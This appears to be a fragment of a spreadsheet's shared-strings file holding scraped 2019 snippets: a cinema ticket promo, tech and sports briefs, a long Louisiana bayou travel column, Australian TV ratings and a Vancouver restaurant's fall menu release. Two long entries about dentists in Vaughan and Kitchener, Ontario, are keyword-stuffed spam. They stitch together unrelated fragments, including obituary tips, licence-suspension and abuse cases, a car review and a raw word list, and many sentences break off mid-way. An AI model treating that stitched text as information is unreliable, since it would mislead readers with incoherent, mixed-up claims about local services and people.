    <t>Hottest New Movies with HOYTS Tickets from $11.99! One HOYTS General Admission Movie Ticket - $11.99 One HOYTS LUX Movie Ticket - $24.99 Valid for sessions screening Friday 11 October - Wednesday 27 November 2019 inclusive. No presales. Not valid Saturdays after 5:00pm and public holidays. Valid for use in Australia only - find your nearest HOYTS cinema location here: https://www.hoyts.com.au/cinemas</t>
  </si>
  <si>
    <t>APPLE is widely-tipped to launch an all-new iPhone SE in the first few months of next year with the same speedy internals as the latest £729 iPhone 11. But if the latest report around the so-called iPhone SE 2 price is to be believed, it will bring that speed to your pocket for much, much less. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>For more than 30 years, residents on North Adelaide’s Barnard St, only had to glance out of their front windows to catch a glimpse of some of Australia’s biggest names in sport, business and politics.</t>
  </si>
  <si>
    <t>Gerry Feehan</t>
  </si>
  <si>
    <t>The news from Louisiana is often hurricanes, burst levees and the dangerous streets of New Orleans. What we’ve discovered down south has been unreserved hospitality. A few years ago, on our first trip through the Bayou State, the weather turned cold. We became stranded in the town of Natchitoches, blindsided by a gale of sleet. Thrilled locals informed us they hadn’t seen snow in NAK-a-tish (that’s how it’s pronounced) for nine years. As polite Canadians, we controlled our elation. As luck would have it, we had arrived the day of the annual river-barge parade. We mingled with happy revellers on the banks of the Red River. As we strolled, the sound of a Cajun band spilled from an antebellum mansion fronting Front Street. The owner, a well-dressed southern gentleman, was watching the parade through his wrought-iron fence. Small talk ensued. Soon the wandering Canadians were invited into a stately pre-Civil War home to join a bonne fête. The party lasted into the wee hours. Filet gumbo, stomping feet, a crackling fire and genuine Louisiana friendliness kept us warm. After much cajoling, I joined the band, rang the Cajun ti-fer … and did credit to all Canadians – in the beverage consumption department. On our return to Louisiana this time, we bypassed Natchitoches, hugging the Gulf Coast, seeking the blue bayou of the South. Roadside billboards stuck in the swamp advertised free consultation to shrimpers still affected by the Deepwater Horizon disaster. The ex-lawyer in me was intrigued. The guy seeking quiet solitude was … quietly disgusted. The bayous of Louisiana start where the Mississippi River begins to end: in the silted course of its enormous delta. Braided channels open and close. New rivers form. Shallow, meandering creeks emerge in swamps overgrown with cypress and mangrove forests. These muddy backwaters are the birthplace for a vast array of aquatic life. Their predators – birds and reptiles – lurk quietly in the sultry stagnant shadows. When we arrived at the Morgan City campground, it was dark. We were hungry, tired, irritable – and without a reservation. Most horrible camping experiences begin with a late arrival. While attempting to set up in the dark, I backed into the last open site, glancing off an oak tree and a concrete picnic table, fanning the fires of a simmering matrimonial dispute. I walked, fuming, past a campsite’s roaring fire toward the office to register. A happy group of tenters were huddled near the flames, laughing and smoking. “You were pretty lucky to get that spot on a busy weekend,” said the affable occupant of site B12. “Where y’all from? I told him Alberta, and said we were hungry and hoping to find a Cajun restaurant nearby. He recommended a place in town down by the Riverwalk and wished us a pleasant evening. My mood was greatly improved when we drove back through the gate a couple of hours later, stuffed to overflowing with crawfish and dirty rice. “How was the Creole?” The small group settled around B12’s fire was well into their cups and still going strong. My relaxed demeanour confirmed we had not been led gastronomically astray. “Why don’t you and your wife come on over for a drink?” asked the friendly fellow who was responsible for my contented smile. I slipped into our RV and grabbed a couple of Pilsners I had lugged from home. I handed a cold one to Dean Landry and his wife Vicky. “These all the way from Canada?” Dean asked. “Yup. There is no finer Canadian beer.” (I had my fingers crossed behind my back.) “How come he talk so funny?” asked Zach, Vicky’s precocious 12-year-old. “Sshh, you mind your manners,” said Miss Vicky. Zach carried on, unabashed. “You got a different kind ’a money up ther’ in Canada?” I reached into my pocket and handed Zach a blue five-dollar bill. I proudly told him it was worth almost $4 American and that it was now his. “This’s made out of plastic,” he screamed, running through the campground, announcing to the world that some geezer from Canada had just given him a foreign blue fiver. “Why you come down to these parts?” Mr. Landry asked. His surname and that unique Louisiana cadence confirmed his Cajun ancestry. (Cajuns are the descendants of Acadians, French Canadians expelled from Nova Scotia in the 18th century. They brought a distinct culture and dialect to the swamps of the south. To the uninitiated, Cajun French is unintelligible. Their English is only marginally more comprehensible. For instance, if a Cajun asks, “Where you gonna powk de caw?” he is not rudely inquiring about your bedroom habits, he’s just asking where you intend to park the Buick.) “We’re here to see the bayou,” I told Dean. “I want to get into the backwaters, see the swamp, the alligators. I noticed there are some operators in town offering boat tours. What do you think?” Dean looked at the fire for a moment, drained the last of his Pil and said, “You an early riser?” “Not particularly,” I replied truthfully. “Dean, he an early bird,” chimed in Vicky. “He’s up with the roosters.” “I live only a little more than 50 mile from here, up near Thibodeau, in Lafourche Parish.” Unlike the other 49 states of the union, which have counties, Louisiana is divided into parishes – further tribute to its French roots. “Ain’t any big deal for me to scoot over first thing in the morning and hook up my boat. By the time y’all get up, my skiff’ll be waiting for you. I’ll show you the real bayou, not some tourist crap.” We’d had a few brewskies by then – and I don’t put a lot of stock in late-night campfire bravado. So when I popped my head out of the camper the next morning, my expectations for a bayou experience weren’t high. “There you are,” shouted Dean, wiping down the lovely flat-bottomed craft that had appeared at his site. He’d driven 80 km to his home, breakfasted with his daddy, hitched up the boat and returned – all while I was still sawing logs. “And he’s been polishing that motor for near an hour now,” Vicky smiled. My mother told me I’d never amount to anything if I didn’t get up early and get to it. But somehow serendipity follows my late-morning shadow, shaking me awake with fortunate encounters. Vicky, Zach, my wife Florence and I jumped into the boat and Dean motored us into the bayou. The perspective from water was entirely different from the bits of swamp we could see while driving. Narrow, muddy channels serpentined every which way and within minutes, I was completely lost in a vast wet labyrinth. We floated through vast groves of bald cypress trees draped in Spanish moss, their knees soaked in brackish water. We passed “fishing camps” – remote wooden cabins fronted by a small deck for fishing. (Many sported a Confederate flag. For the south, the Civil War is not yet over.) The gators were out, sunning on logs or floating motionless, eyes protruding silently above the water. These malevolent-looking reptiles can grow to four metres and 400 kg – top of the food chain in these hidden warrens. In the bayou, it’d be easy to dispose of things unwanted. I was glad Dean was a friendly chap. Zach acted as lookout, chatting constantly, identifying all flora and fauna the bayou had to offer. An abandoned orange hurricane pod, resembling a wayward UFO, floated uselessly in a backwater, testament to the unrelenting power of Mother Nature. We moored for lunch at Gros’ Place, a remote camp accessible only by water. A huge kettle of fragrant jambalaya boiled above an open fire. A fresh-dressed deer carcass dangled from a hook in the kitchen. After a meal of fried catfish and white beans, and an afternoon of great camaraderie, Dean steered us out of the bayou, effortlessly retracing our path through the indiscernible twisting, turning channels. The sun, shining through a thick canopy of cypress and mangrove, hinted vaguely at our direction of travel. At the dock, we shook hands with Dean and Vicky, said goodbye and climbed into our RV, headed for New Orleans. As we pulled away, Zach strolled up. I rolled down the window. “That new? That got a diesel engine in it? My grandpa told me down on the farm that you got to fill a special compartment with somethin’ called urea to keep a diesel engine running. Urea same as pee, but you got to pay 20 dollar for five gallons.” If there’s one thing I can’t stand, it’s a know-it-all kid. I thanked him for his advice and drove off. “That kid is either a savant or a nut,” I said to Florence. Less than 100 km down the road, a yellow warning light flashed on the dash. I pulled over. The owner’s manual indicated there was a malfunction in something called the DEF. The problem required immediate attention. After 20 ignition starts, the vehicle would be rendered inoperable. I stopped at an Auto Zone and explained my problem to the man behind the counter. “You need to add DEF fluid. It’s over there behind the antifreeze. It’s really just urea,” he said in a thick Cajun drawl. “Yeah,” I replied. “Just like pee, but costs 20 bucks.” Travel writer Gerry Feehan, QC, is a retired lawyer, avid traveller and photographer, based in Alberta, Canada. © Travel Like This The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Down on the bayou: Cajun hospitality and gators appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Alberta Premier Jason Kenney says legislation is coming this fall to crack down on protesters who trespass on farms and agricultural land.</t>
  </si>
  <si>
    <t>Indian captain Virat Kohli reached a number of new milestones in a wondrous, unbeaten knock on day two of the second Test in Mumbai.</t>
  </si>
  <si>
    <t>MALEFICENT MISTRESS OF EVIL star Angelina Jolie was in London for the European premiere last night. Watch her at today’s press conference as she joined castmembers Ed Skjrein, Chiwetel Ejiofor, Elle Fanning, Sam Riley and Harris Dickinson to discuss the upcoming Disney sequel. Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>Magpies captain Steph Chiocci has declared AFLW players “just want to play football” after the Players' Association expressed concern about legal advice issued.</t>
  </si>
  <si>
    <t>Paris trip The post Paris trip appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Report: Top 20 Consolidated 7 Programs Channels: All Free-to-Air Market: 5 City Metro (aggregate figure) Demographics: Total People Day-part: 02:00 – 26:00 Day: Wednesday Date: 02/10/2019 Deliverable: Consolidated 7 v Overnight Rank Description (grouped) Channel\Network Consolidated 7 Overnight Increase 000s 1 THE BLOCK -WED Nine 981,000 853,000 128,000 2 SEVEN NEWS Seven Network 941,000 940,000 2,000 3 SEVEN NEWS / TODAY TONIGHT Seven Network 937,000 934,000 3,000 4 GRUEN-EV ABC 874,000 755,000 119,000 5 NINE NEWS 6:30 Nine 828,000 826,000 2,000 6 UTOPIA-EV ABC 818,000 599,000 218,000 7 NINE NEWS Nine 793,000 788,000 5,000 8 A CURRENT AFFAIR Nine 734,000 717,000 17,000 9 HARD QUIZ S4-EV ABC 720,000 667,000 53,000 10 ABC NEWS-EV ABC 623,000 619,000 4,000 11 HOME AND AWAY Seven Network 613,000 581,000 32,000 12 7.30-EV ABC 537,000 534,000 2,000 13 THE CHASE AUSTRALIA Seven Network 501,000 498,000 3,000 14 BRIDE &amp; PREJUDICE – THE FORBIDDEN WEDDINGS – WED Seven Network 472,000 438,000 35,000 15 HOT SEAT Nine 432,000 429,000 3,000 16 THE SHOW MUST GO ON: THE QUEEN + ADAM LAMBERT STORY Nine 429,000 406,000 23,000 17 THE PROJECT 7PM Network 10 424,000 418,000 6,000 18 BONDI RESCUE Network 10 344,000 324,000 19,000 19 BONDI RESCUE RPT Network 10 317,000 298,000 20,000 20 10 NEWS FIRST Network 10 309,000 308,000 1,000 © OzTAM Pty Limited 2019. The Data may not be reproduced, published or communicated (electronically or in hard copy) without the prior written consent of OzTAM.</t>
  </si>
  <si>
    <t>Photo credit: Tracey Ayton The GOODS from Tractor Vancouver, BC | Tractor Everyday Healthy Foods is celebrating the autumn harvest season by unveiling a fresh lineup of nourishing, fall-inspired dishes – including a number of new vegan and gluten-free options – starting Wednesday, October 16. Available on both the lunch and dinner menus at all six Vancouver locations, Tractor’s latest fall offerings include a wholesome variety of everyday staples like veggie-packed salads, sandwiches, soups and stews all made with nutritious, heart-healthy ingredients. With a focus on creating sustainable, high-quality fare, Tractor’s culinary team prepares all menu items on-site in small batches to ensure freshness and minimize food waste. Highlights on the new seasonal menu include a hearty, protein-packed Turkey Chili made with lean ground turkey, black beans and chickpeas; a house-made vegan Beet and Walnut Burger topped with avocado parsley spread and pickled red onions; and a vegan Kale Caesar Salad featuring a creamy hummus and cashew dressing and garlic-roasted chickpeas. Photo credit: Marquardt Photography The full lineup of fall menu additions includes: – Beet + Cauliflower Salad: steamed beets, roasted cauliflower, braised radishes, tahini lemon dressing, parsley and almond dukkah (VEGAN &amp; GF); – Kale Caesar Salad: shredded dinosaur kale and Brussels sprouts, toasted breadcrumbs, crispy roasted chickpeas, lemon cashew dressing (VEGAN); – Brussels Sprouts + Apricot Salad: roasted Brussels sprouts, shredded Brussels sprouts, radicchio, roasted butternut squash, apricot mustard vinaigrette (VEGAN &amp; GF); – Turkey Chili: ground turkey, bell peppers, black beans, chickpeas, tomatoes and spices topped with crispy roasted chickpeas (GF); – Beet + Walnut Burger: house-made vegan patty made with beets, walnuts, black beans and portobello mushrooms topped with avocado parsley spread, greens and pickled red onions (VEGAN). “We are very veggie heavy at Tractor – we always have been – and our new fall menu really caters to our plant-based customers,” says co-founder and owner Meghan Clarke. “As an eco-conscious organization, we believe it’s important to offer a wide variety of vegetarian and vegan options as part of our overall commitment to environmental sustainability.” All of the fresh seasonal items on Tractor’s new fall menu will be available daily from 11 a.m. to 9:30 p.m. and can be enjoyed in the restaurant’s airy cafeteria-style dining room or taken to go in 100-percent compostable packaging. For those who are short on time, Tractor’s new grab-and-go kitchen is now available at the restaurant’s Park Place location (666 Burrard St.). The Tractor Digital app allows guests to pre-order their meal with a desired pick-up time, skip the line in-store and enjoy a fresh and fast lunch on the go. For more information, visit www.tractorfoods.com. About Tractor Everyday Healthy Foods | Tractor Everyday Healthy Foods is locally owned and operated by Meghan and Steve Clarke who left the corporate world to fulfill their dream of making healthy food accessible to busy families and professionals. Along with their culinary team, they opened the first restaurant, Tractor Kitsilano, in June 2013 and with it introduced the idea of quick, healthy eating and catering to Vancouver. The concept caught on and in February 2015 they opened their second location, Tractor Marine, in the Burrard business district. With the opening of each new eatery, Tractor Everyday Healthy Foods is showcasing how healthy eating can, and should, be a key part of everyday life.</t>
  </si>
  <si>
    <t>Nepali Urdu Dictionary – travel dictionary to translate Nepali to Urdu. Click on the list to show Nepali or Urdu synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Nepali Urdu Dictionary →</t>
  </si>
  <si>
    <t>Being a design site that has showcased and even preferred innovative. that cares for its near and dear pal, the toothpaste. Kid Friendly Dentist Near Vaughan Ontario Vaughan Children’s Dentistry, in Vaughan, ON, offers specialized services in pediatric dentistry. This Vaughan dental care office provides procedures for children of all ages, and offers a list of child-friendly services, including sedation, tooth-coloured fillings and crowns for primary teeth, treatment of thumb-sucking and finger sucking habits, and more. The services are rendered by an. Police have alleged Alek Minassian rented a van from Vaughan, Ont. The interview at a police station near the scene. Dentist near me ( vaughan , woodbridge , maple ) Marble Dental Clinic, provides leading dental services in vaughan , Woodbridge , Maple . Our expert dentists are knowledgeable and provide best quality dental care using the cutting-edge. Jhu Health Insurance Supports the MetLife Preferred Dentist Program, a Dental PPO plan Visit any licensed dentist or specialist (however, out of pocket costs are usually. Jhu Health Insurance Offers the greatest selection of participating den. Highest Rated Dental Clinic In Vaughan Ontario Kid Friendly Dentist Near Vaughan Ontario Vaughan Children’s Dentistry, in Vaughan, ON, offers specialized services in pediatric dentistry. This Vaughan dental care office provides procedures for children of all ages, and offers a list of child-friendly services, including sedation, tooth-coloured fillings and crowns for primary teeth, treatment of thumb-sucking and finger sucking habits, and more. Highest Rated Dental Clinic In Vaughan The Best 10 Dental Hygienists in Vaughan, ON Showing 1-10 of 98 Vaughan Health &amp; Medical Dental Hygienists All Filters $ $$ $$$ $$$$ Open Now Sort By Recommended Highest Rated Most Reviewed Neighbourhoods Thornhill Woods Kleinburg Woodbridge. Best Medicine to Reduce Drooling in People with Developmental Disability – New study highlights the best medications Open Enrollment: How to Choose a Dental Plan – If you know the dental procedures you need to have completed, you will know exactly how much you will pay for your dental. Our policies will make it easier for Vaughan-Woodbridge’s citizens to stay in Vaughan-Woodbridge. Mohammed Khan, Independent. Treat your teeth right with a visit to the office of Keith E. Vaughan DDS in Yorktown, Virginia.We would like to welcome you to our dental practice, where we believe the way to practice comprehensive dentistry is with concern, clear and concise. Dentist Near Me Info for Patients Testimonials Contact Us Gallery Meet our team Experience the highest level of dental expertise and personal attention you deserve. Dr. Donato Viggiani. Finding a dentist near me for a same day dental implants in Maple, Woodbridge and Vaughan? Contact our clinic, Mapleridge Dentistry for the best dental implants services in the area!. Dental implants have become the preferred option for many.</t>
  </si>
  <si>
    <t>On This Day: Hammers sweep Blackpool aside Original Source Taking a look back at a classic West Ham United moment on this day in history, in association with Basset &amp; Gold…. West Ham United’s promotion winning 2011/12 campaign got a boost on this date in the calendar when Blackpool were the visitors to the Boleyn Ground, and returned to Lancashire well-beaten. The Hammers scored four goals without reply, John Carew opening the scoring with just 12 minutes played. Three goals in 12 second half minutes put the outcome beyond doubt, as Sam Baldock netted twice and Jack Collison added a fourth. Watch the goals again in our video above. Basset &amp; Gold are West Ham United’s official sleeve sponsor and eSports partner. Their mission is to challenge the market and create investment opportunities that are easy to understand, transparent and continuously control risk, while maintaining market-leading returns that meet investment goals. Click here to find out more.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On This Day: Hammers sweep Blackpool aside appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Richard Roxburgh has reprised the role of Bob Hawke for The Crown, the Daily Mail reports. Roxburgh will play the late prime minister in Season 4, expected next year, in scenes dramatising a 1983 visit by Prince Charles &amp; Diana. A villa in Spain has been transformed into the governor-general’s Canberra residence for filming purposes. Josh O’Connor plays Prince Charles in Series 3, due next month, and Series 4. Roxburgh previously portrayed Hawke in 10’s telemovie in 2010. Photo: Daily Mail</t>
  </si>
  <si>
    <t>The business wants to embrace a number of technologies, including automation and robotics.</t>
  </si>
  <si>
    <t>Soundbars are now so established in the lounge room that TV sellers just assume you have or want one, and now Creative is moving the format to PC.</t>
  </si>
  <si>
    <t>MORNING BRIEFING: The Rural Fire Service says it will begin assessing the full extent of the bushfire damage in northern New South Wales today, and a man is charged after a robbery in 2003.</t>
  </si>
  <si>
    <t>Some 214 people have died on Victorian roads this year, up from 159 deaths at the same time last year.</t>
  </si>
  <si>
    <t>Is the left still claiming blacks can’t be racist?</t>
  </si>
  <si>
    <t>English Polish Hangman game – select either to guess the English or the Polish word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English Polish Hangman →</t>
  </si>
  <si>
    <t>Credit Counseling News This Is How Many People Flocked Away From These Major U.S. Cities Over The Past Decade Tuesday 15 October 2019 07:24 AM UTC-05 | Tags: american-cities cities housing-market impact real-estate travel unemployment-rate us-destination For years, big cities like New York, Los Angeles and San Francisco have been associated with the American dream. However, residents have also been regularly leaving these big metro cities in swarms for a life of lower prices, less crime and more job opportunities. Here are 25 of the major cities that have seen the largest population migrations during the last decade. Tags: american-cities cities housing-market impact real-estate travel unemployment-rate us-destination</t>
  </si>
  <si>
    <t>Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you Go. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo families. We would love. The coverage would start in 2020 and would include partial coverage for households with incomes between $70,000 and $90,000, Singh said Wednesday morning at a training clinic for dental hygienists at. Kid Friendly Dental Clinic Near Kitchener Ontario Find and compare reviews for Dentists in Kitchener, Ontario, Canada | de Man &amp; Höediono Dentistry, Fairway Dental Urgent Care Clinic, Dentistry in Waterloo, Boeri, Sorin DDS, Smile Town What: Where: For Companies Sign in / Sign up Add a. The friendly dental team at Kitchener Dental are delighted to welcome you. Let us make you feel right at home by showing you modern dental technologies and a gentle approach to general, KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. KW Dentists Toggle navigation Dentistry Services. Best Dental Clinic Near Kitchener Ontario Choose the best dentist in Waterloo &amp; Kitchener. We are a leading dental clinic in Waterloo offering trusted emergency dental care services to clients. Read this collection of the best obituary examples to help make writing easier. Includes examples of obituaries for mom, dad, children, grandparents &amp; military. International Student Handbook 2019/2020 | Conestoga College. Conestoga College Institute of Technology and Advanced Learning. This is a companion document to. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Enamel Republic Family. Region of Waterloo Public Health Breastfeeding Services Clinic: Public Health Breastfeeding Services is run by Public Health Nurses. This service offers one-to-one breastfeeding assessments, advice and referrals to community supports free of charge. Cosmetic Dentist In Kitchener Friendliest Dental Clinic In Kitchener Ontario Dave Thomas, founder of Wendy’s, loved the KewPee Burgers so much, he decided to make a similar restaurant chain. Wendy’s Old Fashioned Hamburgers was founded in 1969 in Columbus, Ohio. Thomas named the restaurant after his fourth child, Melinda Lou “Wendy” "The ministry is aware that the College of Dental Hygienists of Ontario has submitted a proposed. While working at a. Most Popular Dentist In Kitchener Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo. KITCHENER – A former Guelph dental hygienist who lost his licence. off work for almost three weeks since the Superior. Highest Rated Dentist Near Kitchener Number 1 Dentist In Kitchener Ontario Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Most Popular Dental Clinic Near Kitchener Ontario Kw Urgent care centre kitchener-waterloo, emergency medical services. We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. Best Dental Hygienists in Kitchener, ON – Lumi's Dental Hygiene Care, Champion Dental Hygiene, University Dental Hygiene Clinic, Huay-Leng Lee Dentistry, Mi Dental Yelp Find Near Cancel Log In Sign Up Restaurants Home Services Auto Services. Choose the best dentist in Waterloo &amp; Kitchener. We are a leading dental clinic in Waterloo offering trusted emergency dental care services to clients. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Enamel Republic Family. Kid Friendly Dentist Near Kitchener Ontario Fun Things to Do in Kitchener with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 2,128 traveler reviews and photos of kid friendly Kitchener attractions. Cambridge is the best place to call home, offering all you need in city conveniences with less smog, less crowding and more nature retreats – where river views, rolling hills, farmland and ravines contrast alongside modern shopping malls, trendy cafes, restaurants, art galleries, antiques and giftshops.Cambridge has the best of both worlds – old world historic architecture which is an. Fun Things to Do in Kitchener with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 2,133 traveller reviews and photos of kid friendly Kitchener attractions Kitchener Kitchener Tourism Kitchener Hotels Kitchener Bed. Home Ontario Elora Kid-Friendly Activities Things to Do with Kids in Elora, Ontario TripBuzz found 29 things to do with kids in or near Elora, Ontario, including 24 fun activities for kids in nearby cities within 25 miles like Kitchener, Cambrid. Murdoch Mysteries is a Canadian detective series set in late nineteenth- and early twentieth-century Toronto, based on a series of novels by Maureen Jennings.The series centers around William Murdoch, a detective in the Toronto constabulary with an interest in using then-unorthodox/unknown forensic techniques for catching criminals. Number 1 Dentist Near Kitchener Top Dentist Near Kitchener Ontario Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increas. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. The top rated &amp; reviewed dentists in Kitchener, ON. See below for which dentists are accepting new patients, their profile, credentials and clinic locations. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists Parada Dentures Dentist. . (CTV News Kitchener) "I have cleaned my. "I can’t accept this as a person – not as a dental hygienist." Tanase is hoping. Parolee’s massage therapy licence suspended over sex-abuse allegations – KITCHENER — A parolee who worked as a massage therapist has had his licence to practise suspended a second time. "The College of Massage Therapists of Ontario is investigating. allegations of harm, Near Me. All Male Female. All Verified Doctors Only. All Accepting New Patients. The Best Dentists in Kitchener, ON What is a Dentist? Dr. Stefan Ciz. Verified. Dentist. 25 reviews. Dr. Stefan Ciz’s Latest Rating. The staff used to be good and reasonable about 6 years ago. ©2004-2019 RateMDs Inc. – Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitchener) near Grand River. The Kitchener Rangers host the hyped Saginaw Spirit in the season opener at the Aud. The Spirit lost to the eventual champs, A 67-year-old Kitchener man is off to prison after pleading. 20, 2018 in the parking lot of a Salvation Army building near. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you. Go. Let us help you find the perfect dentist Go. Best of 2019 – Dentists in Kitchener, ON Best of 2019 – Dentists in Kitchener, ON. Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. Top Dentist Near Kitchener Ontario Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists Parada Dentures Dentist. . Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increas. New video in Kitchener shooting case, defrauder sentenced, dog comes home: Top stories of the week – A 67-year-old Kitchener man is off to prison after pleading. 20, 2018 in the parking lot of a Salvation Army building near. Parolee’s massage therapy licence suspended over sex-abuse allegations – KITCHENER — A parolee who worked as a massage therapist has had his licence to practise suspended a second time. "The College of Massage Therapists of Ontario is investigating. allegations of harm, Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you. We welcome new patients of all ages. Our new office has expanded and is now located to 765 King Street West (Kitchener) near Grand River. Preferred Dental Clinic In Kitchener Ontario Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question. KITCHENER – A. one of three at the same clinic who suffered the same consequences. Documents from the discipline committee. Preferred Dental Clinic In Kitchener Ontario Preferred Dentist Near Kitchener Dentist Kitchener Our dentist office in Kitchener welcomes all members of the family including the elderly, teenagers, children, and even infants. We believe people can have their natural teeth for life if they take care of them properly with. Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Closing. Tips to finding Kitchener ON dentists Get to know your dentist: The best way to find a new dentist in Kitchener ON is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time poking. Dentist in Toowoomba – Kitchener Street Dental is located in Toowoomba and provide a wide range of cosmetic, restorative and general dental treatments. Friendliest Dental Clinic Near Kitchener Friendliest Dental Clinic Near Kitchener Innaloo Dental Clinic Announces Sunday Opening Hours to Better Serve the North-West Perth Suburbs – Local dentist office near Innaloo is now open for business on Sunday to allow more patients to visit. 7 Result Driven Tips to Increase Your Dental Clinic Appointment Rate with Digital Marketing – Let us go through how GMB promotion works: • When a patient searches for dental clinics near them, your website will be shown. and other important updates to your targeted patients, or just drop a. Preferred Dentist Near Kitchener Ontario Visiting us means you won’t have to dread visiting the dentist again. Kitchener Dental Services. Welcome to our General and Family Dentistry, located in Kitchener, Ontario. We offer a Emergency Dentistry, Pediatric Dentistry, and Restorative. Kitchener, Ontario 630 Dentists near you Go StarOfService Ontario Kitchener Dentists Hire the best Dentists in Kitchener. Dentist N2A 0A1 Kitchener (Show more) (Show less) Show more 13. Contact. . Most Popular Dentist Near Kitchener The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and. Road test – 2019 BMW Z4 M40i – What’s Best: It’s a true roadster with all the panache and pace. What’s Interesting: Despite the engineering challenges in. Dentures – The most popular option for replacing several missing teeth, our dentures are lightweight, durable, comfortable and natural-looking. In the world of French baking, the kouign-amann is often lauded as the most luxurious pastry. driven bakery and café in. Preferred Dentist Near Kitchener Ontario Cosmetic Dentist Near Kitchener Ontario Highest Rated Dentist Near Kitchener Ontario The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach. The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. Pricey $$$$ Ultra High-End Open Now Find businesses that are open now Sort By Recommended Highest Rated Most “My services have been banned because of a misunderstanding and misinformation.” Tanase first began working as a dental. While working at a clinic in Guelph. (CTV News Kitchener) "I have cleaned my wife’s teeth and I was charged with sexual. Two other dental hygienists lost licences at same dentistry for treating partners, docs show – KITCHENER – A Guelph-based dental hygienist who lost his licence for cleaning his wife’s teeth is one of three at the same. Friendliest Dental Clinic In Kitchener a aa aaa aaaa aaacn aaah aaai aaas aab aabb aac aacc aace aachen aacom aacs aacsb aad aadvantage aae aaf aafp aag aah aai aaj aal aalborg aalib aaliyah aall aalto aam. Here’s Why Shiny White Dental Center. Friendliest Dental Clinic Near Kitchener Innaloo Dental Clinic Announces Sunday Opening Hours to Better Serve the North-West Perth Suburbs – Local dentist office near Innaloo is now open for business on Sunday to allow more patients to visit. Kid Friendly Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Find and compare reviews for Dentists in Kitchener, Ontario, Canada | de Man &amp; Höediono Dentistry, Fairway Dental Urgent Care Clinic, Dentistry in Waterloo, Boeri, Sorin DDS, Smile Town What: Where: For Companies Sign in / Sign up Add a. The friendly dental team at Kitchener Dental are delighted to welcome you. Let us make you feel right at home by showing you modern dental technologies and a gentle approach to general, KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. KW Dentists Toggle navigation Dentistry Services. Best Dental Clinic Near Kitchener Ontario Choose the best dentist in Waterloo &amp; Kitchener. We are a leading dental clinic in Waterloo offering trusted emergency dental care services to clients. Read this collection of the best obituary examples to help make writing easier. Includes examples of obituaries for mom, dad, children, grandparents &amp; military. International Student Handbook 2019/2020 | Conestoga College. Conestoga College Institute of Technology and Advanced Learning. This is a companion document to. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Enamel Republic Family. Region of Waterloo Public Health 